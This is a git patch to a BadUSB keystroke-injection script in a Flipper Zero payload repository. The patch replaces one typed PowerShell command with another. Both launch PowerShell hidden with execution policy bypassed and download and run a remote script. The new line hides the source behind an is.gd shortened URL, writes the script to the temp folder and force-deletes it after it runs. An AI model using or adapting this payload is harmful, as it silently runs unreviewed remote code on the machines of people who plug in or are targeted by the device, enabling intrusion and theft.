From 47ad939ab9fd4e073a3cc81356c86a872a151bdb Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 24 Jul 2024 20:54:54 +0000 Subject: [PATCH] Update US-Keyboard.txt --- US-Keyboard-Layout/US-Keyboard.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/US-Keyboard-Layout/US-Keyboard.txt b/US-Keyboard-Layout/US-Keyboard.txt index 9479f31..d60a0ec 100644 --- a/US-Keyboard-Layout/US-Keyboard.txt +++ b/US-Keyboard-Layout/US-Keyboard.txt @@ -10,7 +10,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/US-Keyboard-Layout/main.ps1 | iex +STRING powershell -ep bypass -w h -c cd $env:temp; irm is.gd/3jgz85 > run.ps1; & run.ps1; sleep 1; rm run.ps1 -force ENTER